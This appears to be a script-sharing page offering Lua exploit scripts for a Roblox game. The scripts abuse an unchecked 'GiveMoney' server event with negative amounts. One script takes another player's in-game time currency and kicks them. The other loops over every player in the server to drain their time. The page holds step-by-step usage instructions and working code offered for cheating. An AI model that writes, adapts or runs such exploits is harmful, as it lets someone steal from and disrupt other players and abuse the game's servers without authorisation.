LIMITED TIMES (LIMITED WORDS) | Take OTHER TIMES | KICK PEOPLE | Give yourself TIME

MADE BY Metestedlal

FEATURE:

  • KICK PEOPLE
  • TAKE OTHER TIMES
  • GIVES MONEY
  • .
  • HOW TO USE:

if you change ENTERNUMBERHERE to anything above their time, they get kicked.
also if you take some time, it adds it to yours so if you do -500,000 for example on someone with 1,400 time, they’ll get kicked and youll get 500,000 time

USERNAMEHERE has to be caps sensitive and make sure ENTERNUMBERHERE is negative, if its positive it gives them time from your wallet

GAME LINK:
LIMITED TIMES (LIMITED WORDS)

SCRIPTS: [2]

local args = {
    [1] = game:GetService("Players").USERNAMEHERE,
    [2] = ENTERNUMBERHERE
}
 
game:GetService("ReplicatedStorage").GiveMoney:FireServer(unpack(args))

STEAL OTHER PEOPLE TIME

while true do
    wait(0.01)
    local args = {
       [1] = game:GetService("Players"):GetPlayers(),
       [2] = -1000
    }
 
    game:GetService("ReplicatedStorage").GiveMoney:FireServer(unpack(args))
end

FREE MONEY WITHOUT STEALING

⚠️ Warning: Do not download any extensions or anything other than .txt/.lua file, because script will download only in .txt/.lua format or It will redirect you to a pastebin link.

📋 Notice: If you find any of the scripts patched or not working, please report it to Forever4D through Discord. The script will be removed or marked as patched!